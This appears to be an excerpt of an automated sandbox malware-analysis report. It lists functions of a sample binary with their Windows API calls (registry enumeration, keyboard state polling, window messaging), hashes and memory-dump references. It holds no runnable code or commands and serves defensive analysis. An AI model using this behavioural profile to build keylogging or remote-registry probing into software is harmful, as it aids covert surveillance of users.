              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CreateHandle$FilePipe
              • String ID: nul
              • API String ID: 4209266947-2873401336
              • Opcode ID: 5631892dac13882075b95d718624364f7870ad903f85103931cef59f69561196
              • Instruction ID: 5fa7e616ceb13e2f93511b48cb3ec2c772d196f4be67f5fe1b3f80eb2b456e73
              • Opcode Fuzzy Hash: 5631892dac13882075b95d718624364f7870ad903f85103931cef59f69561196
              • Instruction Fuzzy Hash: 8521C275644785ABEB209F6A9C04AAEB7E8AF55730F200A19FDF1D32D0D7709841CB60
              Function 001EAEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
              Download Yara Rule
              APIs
              • SetErrorMode.KERNEL32(00000001), ref: 001EAEBF
              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 001EAF13
              • __swprintf.LIBCMT ref: 001EAF2C
              • SetErrorMode.KERNEL32(00000000,00000001,00000000,0020F910), ref: 001EAF6A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ErrorMode$InformationVolume__swprintf
              • String ID: %lu
              • API String ID: 3164766367-685833217
              • Opcode ID: 21ffc6b6178eb708c8e182f188e929f93b12ba5706a65b6d1902b725ce4e004d
              • Instruction ID: fd965f7f3da8e7813f9760f7bf18f46f9c12948d24608665bf38f4e6af5ed86a
              • Opcode Fuzzy Hash: 21ffc6b6178eb708c8e182f188e929f93b12ba5706a65b6d1902b725ce4e004d
              • Instruction Fuzzy Hash: 15218634A00209AFCB10EF65DD85DAE77B8EF89704B004069F909DB252DB71EA41CB61
              Function 001DA52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00187D2C: _memmove.LIBCMT ref: 00187D66
                • Part of subcall function 001DA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 001DA399
                • Part of subcall function 001DA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 001DA3AC
                • Part of subcall function 001DA37C: GetCurrentThreadId.KERNEL32 ref: 001DA3B3
                • Part of subcall function 001DA37C: AttachThreadInput.USER32(00000000), ref: 001DA3BA
              • GetFocus.USER32 ref: 001DA554
                • Part of subcall function 001DA3C5: GetParent.USER32(?), ref: 001DA3D3
              • GetClassNameW.USER32(?,?,00000100), ref: 001DA59D
              • EnumChildWindows.USER32(?,001DA615), ref: 001DA5C5
              • __swprintf.LIBCMT ref: 001DA5DF
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
              • String ID: %s%d
              • API String ID: 1941087503-1110647743
              • Opcode ID: 08b79949eea73fccce68dee2d9a2055d74b00eb4af5795a25d902ccd5088ea26
              • Instruction ID: 906ca72ed9aaa52c587922179c4c90753eed65877989049e48346af118ea4223
              • Opcode Fuzzy Hash: 08b79949eea73fccce68dee2d9a2055d74b00eb4af5795a25d902ccd5088ea26
              • Instruction Fuzzy Hash: A811B471640308BBDF20BFA4DC89FEA377DAF59710F044076B918AA293CB749A458B75
              Function 001E2017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
              Download Yara Rule
              APIs
              • CharUpperBuffW.USER32(?,?), ref: 001E2048
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: BuffCharUpper
              • String ID: APPEND$EXISTS$KEYS$REMOVE
              • API String ID: 3964851224-769500911
              • Opcode ID: 7b36f3361404f061ce511132c68098c0fb7e3821803c5c78d43bbc07aa6bbeaa
              • Instruction ID: 061151707861d4363a5de30d0c889da908affdb336e0a10df22ebe52949ff21c
              • Opcode Fuzzy Hash: 7b36f3361404f061ce511132c68098c0fb7e3821803c5c78d43bbc07aa6bbeaa
              • Instruction Fuzzy Hash: B6118475910109CFCF00EFA4D9914FEB7B4FF6A304F148469E89567292DB325D16CB50
              Function 001FEE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
              Download Yara Rule
              APIs
              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 001FEF1B
              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 001FEF4B
              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 001FF07E
              • CloseHandle.KERNEL32(?), ref: 001FF0FF
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Process$CloseCountersHandleInfoMemoryOpen
              • String ID:
              • API String ID: 2364364464-0
              • Opcode ID: 41963c7884690fc12dd40f3e9a6735e4ca32911d3ef20ef0c31678e3536280ec
              • Instruction ID: d50dbc701df55baede7ddc5007442b350a78f618fceb3506a3ee41cf7a942467
              • Opcode Fuzzy Hash: 41963c7884690fc12dd40f3e9a6735e4ca32911d3ef20ef0c31678e3536280ec
              • Instruction Fuzzy Hash: D18183716043119FD724EF24C886F3AB7E5AF58720F04885DF69ADB292DBB0AD018F51
              Function 002002C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00187F41: _memmove.LIBCMT ref: 00187F82
                • Part of subcall function 002010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00200038,?,?), ref: 002010BC
              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00200388
              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002003C7
              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0020040E
              • RegCloseKey.ADVAPI32(?,?), ref: 0020043A
              • RegCloseKey.ADVAPI32(00000000), ref: 00200447
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
              • String ID:
              • API String ID: 3440857362-0
              • Opcode ID: 80910ee5f2b2cc53ab70bca2bbd88bce70fbe4377be73717a906bb86ea475430
              • Instruction ID: c0e59ddb947f1b8ae62a2887c20cce518c7be4a32b4d00842e107add075aea42
              • Opcode Fuzzy Hash: 80910ee5f2b2cc53ab70bca2bbd88bce70fbe4377be73717a906bb86ea475430
              • Instruction Fuzzy Hash: D6514431218305AFD714EF64D885F6EB7E9FF88704F04896EB595872A2DB30EA14CB52
              Function 001EE7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON
              Download Yara Rule
              APIs
              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 001EE88A
              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 001EE8B3
              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 001EE8F2
                • Part of subcall function 00189997: __itow.LIBCMT ref: 001899C2
                • Part of subcall function 00189997: __swprintf.LIBCMT ref: 00189A0C
              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 001EE917
              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 001EE91F
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
              • String ID:
              • API String ID: 1389676194-0
              • Opcode ID: 053b8c3fadf223d8917fc01bd976a680862db75421959e5978b7ef7739f10a7e
              • Instruction ID: e76e59c096d63d3c70a122951fc193542e0227d2fbdf090ae3b6a51f79eee8a3
              • Opcode Fuzzy Hash: 053b8c3fadf223d8917fc01bd976a680862db75421959e5978b7ef7739f10a7e
              • Instruction Fuzzy Hash: 26513B35A00205EFCF15EF65C9819AEBBF5EF19314B188099E849AB362CB31EE11CF50
              Function 0020A2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 72906bf33817fd6dfa6bf5ed1cb8c45d7607a704cc36e6b2cee098683c1571cb
              • Instruction ID: 67970f071b8400569b3a2c644e065926a976f04cc835a0514b1f9a8def14ac6b
              • Opcode Fuzzy Hash: 72906bf33817fd6dfa6bf5ed1cb8c45d7607a704cc36e6b2cee098683c1571cb
              • Instruction Fuzzy Hash: 4D411735920305AFC720DF28DC48FA9BBA8FB09310F9541A5F855A72E3D770AD61DB52
              Function 00182344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
              Download Yara Rule
              APIs
              • GetCursorPos.USER32(?), ref: 00182357
              • ScreenToClient.USER32(002467B0,?), ref: 00182374
              • GetAsyncKeyState.USER32(00000001), ref: 00182399
              • GetAsyncKeyState.USER32(00000002), ref: 001823A7
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: AsyncState$ClientCursorScreen
              • String ID:
              • API String ID: 4210589936-0
              • Opcode ID: da0f99cf8bcd1cd035f1b0f0b413a333f4c9fca9ae92dac0e2df81090c79c40d
              • Instruction ID: 86ccd4e131f3be9d0291a87268c3c9945e2ba88a4fd0827c9a1df2976cb1213b
              • Opcode Fuzzy Hash: da0f99cf8bcd1cd035f1b0f0b413a333f4c9fca9ae92dac0e2df81090c79c40d
              • Instruction Fuzzy Hash: A641A275604219FBDF1A9F68C848AEEBB74FF09320F20435AF829A2290C7345A50DFD1
              Function 001D6920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
              Download Yara Rule
              APIs
              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001D695D
              • TranslateAcceleratorW.USER32(?,?,?), ref: 001D69A9
              • TranslateMessage.USER32(?), ref: 001D69D2
              • DispatchMessageW.USER32(?), ref: 001D69DC
              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001D69EB
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Message$PeekTranslate$AcceleratorDispatch
              • String ID:
              • API String ID: 2108273632-0
              • Opcode ID: 9d5f00f93b6e9af5bc30c2d83a6e2c35689565f84c3526f798e1001984f6148d
              • Instruction ID: 99d9de636f2072c1e51bb58a6623e303cb828e28002fee6a293da7e8df83cb6d
              • Opcode Fuzzy Hash: 9d5f00f93b6e9af5bc30c2d83a6e2c35689565f84c3526f798e1001984f6148d
              • Instruction Fuzzy Hash: 3631F471900206AEDB68CF74EC8CFB6BBACAB13308F104167E421D32A1E775D889D791
              Function 001D8F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
              Download Yara Rule
              APIs
              • GetWindowRect.USER32(?,?), ref: 001D8F12
              • PostMessageW.USER32(?,00000201,00000001), ref: 001D8FBC
              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 001D8FC4
              • PostMessageW.USER32(?,00000202,00000000), ref: 001D8FD2
              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 001D8FDA
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessagePostSleep$RectWindow
              • String ID:
              • API String ID: 3382505437-0
              • Opcode ID: 854ecf1ee788aa49aedd4a8eaa97e6a6543798b58f78d7609fef46544f72fcbc
              • Instruction ID: 9ecb73aaa83096ae1410bd52d84c522dd63c8c96bc9c4a1e4d2d3f7dc2b6d512
              • Opcode Fuzzy Hash: 854ecf1ee788aa49aedd4a8eaa97e6a6543798b58f78d7609fef46544f72fcbc
              • Instruction Fuzzy Hash: 6331CE71500219EFDF14CF68EE4CAAE7BBAEB04315F10422AF925EA2D1C7B09914DB90
              Function 001DB6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
              Download Yara Rule
              APIs
              • IsWindowVisible.USER32(?), ref: 001DB6C7
              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 001DB6E4
              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 001DB71C
              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 001DB742
              • _wcsstr.LIBCMT ref: 001DB74C
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
              • String ID:
              • API String ID: 3902887630-0
              • Opcode ID: 27397f894b8d9c74c6398109993579f3afc03b25848ddbfc89231a636ca2835b
              • Instruction ID: 1a73845036262274713ca861a848d2024ed706b899aa8ac687d9edec66f61702
              • Opcode Fuzzy Hash: 27397f894b8d9c74c6398109993579f3afc03b25848ddbfc89231a636ca2835b
              • Instruction Fuzzy Hash: 7C21FC35248204FBEB255B399D89E7B7B9CDF49750F11403EFC06CA2A1EF61DC419660
              Function 0020B405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00182612: GetWindowLongW.USER32(?,000000EB), ref: 00182623
              • GetWindowLongW.USER32(?,000000F0), ref: 0020B44C
              • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0020B471
              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0020B489
              • GetSystemMetrics.USER32(00000004), ref: 0020B4B2
              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,001F1184,00000000), ref: 0020B4D0
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Window$Long$MetricsSystem
              • String ID:
              • API String ID: 2294984445-0
              • Opcode ID: 68057b53db213eb125fc5ff5ddba3af62f8e10462732b31b921889be62b6f42e
              • Instruction ID: 31cf86a3979ac4da4372b7077ab80e183428ff1bfe7322443b34bad2282e861b
              • Opcode Fuzzy Hash: 68057b53db213eb125fc5ff5ddba3af62f8e10462732b31b921889be62b6f42e
              • Instruction Fuzzy Hash: 53219471920316AFCB319F389C58A693BA4FB05721F114734F925D25E3E7309A20DB50
              Function 001D97E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
              Download Yara Rule
              APIs
              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 001D9802
                • Part of subcall function 00187D2C: _memmove.LIBCMT ref: 00187D66
              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 001D9834
              • __itow.LIBCMT ref: 001D984C
              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 001D9874
              • __itow.LIBCMT ref: 001D9885
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSend$__itow$_memmove
              • String ID:
              • API String ID: 2983881199-0
              • Opcode ID: 1f370e6e65f349d8c50ba02a8fce39126564ccf3994da4a89db999c5a93ef3db
              • Instruction ID: 56ffe70f9e3c73ff0c7c08a3e5085c889916d785e821b58b07d0c3564bb5faab
              • Opcode Fuzzy Hash: 1f370e6e65f349d8c50ba02a8fce39126564ccf3994da4a89db999c5a93ef3db
              • Instruction Fuzzy Hash: C221FB31B00308ABDB10AAA18C8AEAE7BACEF5AB24F040025F905D7381D770CD419BD1
              Function 001812F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
              Download Yara Rule
              APIs
              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0018134D
              • SelectObject.GDI32(?,00000000), ref: 0018135C
              • BeginPath.GDI32(?), ref: 00181373
              • SelectObject.GDI32(?,00000000), ref: 0018139C
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ObjectSelect$BeginCreatePath
              • String ID:
              • API String ID: 3225163088-0
              • Opcode ID: 7637e8cdbf6174440238ec858b22c2f5f99059a000af2ca7835b0b67bd597cd5
              • Instruction ID: 99e31774ed64176afd6e246b5c348f6d574fc0f8e58344b9221665b082147e47
              • Opcode Fuzzy Hash: 7637e8cdbf6174440238ec858b22c2f5f99059a000af2ca7835b0b67bd597cd5
              • Instruction Fuzzy Hash: C621B276800708EFDB109F24FC0C7693BB9FB02722F104225F804925A0D3718996CF91
              Function 001DC161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _memcmp
              • String ID:
              • API String ID: 2931989736-0
              • Opcode ID: 3faf226f32230581ff1f45ab27f39d66dbcb2c8e5a64ff57c059cbeb4e2dad81
              • Instruction ID: 3c6b4ffbda6981c80e16593342ec9351bb0456924227aab0d71f84d18173bbe5
              • Opcode Fuzzy Hash: 3faf226f32230581ff1f45ab27f39d66dbcb2c8e5a64ff57c059cbeb4e2dad81
              • Instruction Fuzzy Hash: 300192B1A04227FBE204A6249C42FBB639C9F32394F054522FD08D6383E7A49E25C2E0
              Function 001E4D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
              Download Yara Rule
              APIs
              • GetCurrentThreadId.KERNEL32 ref: 001E4D5C
              • __beginthreadex.LIBCMT ref: 001E4D7A
              • MessageBoxW.USER32(?,?,?,?), ref: 001E4D8F
              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 001E4DA5
              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 001E4DAC
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
              • String ID:
              • API String ID: 3824534824-0
              • Opcode ID: d802c28b322b790937086c3f1a554d4d33ff08043fa56e492694f316c12bc4db
              • Instruction ID: 475beb83decc6bb8ff7f3ad83ad587a4b73c48789dcd20d160fdc1f760be4c8a
              • Opcode Fuzzy Hash: d802c28b322b790937086c3f1a554d4d33ff08043fa56e492694f316c12bc4db
              • Instruction Fuzzy Hash: C71121BA904789BBC7108FB8AC0CAAE7BACEB56320F144265FD18D3251C7B18C0087A1
              Function 001D874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
              Download Yara Rule
              APIs
              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 001D8766
              • GetLastError.KERNEL32(?,001D822A,?,?,?), ref: 001D8770
              • GetProcessHeap.KERNEL32(00000008,?,?,001D822A,?,?,?), ref: 001D877F
              • HeapAlloc.KERNEL32(00000000,?,001D822A,?,?,?), ref: 001D8786
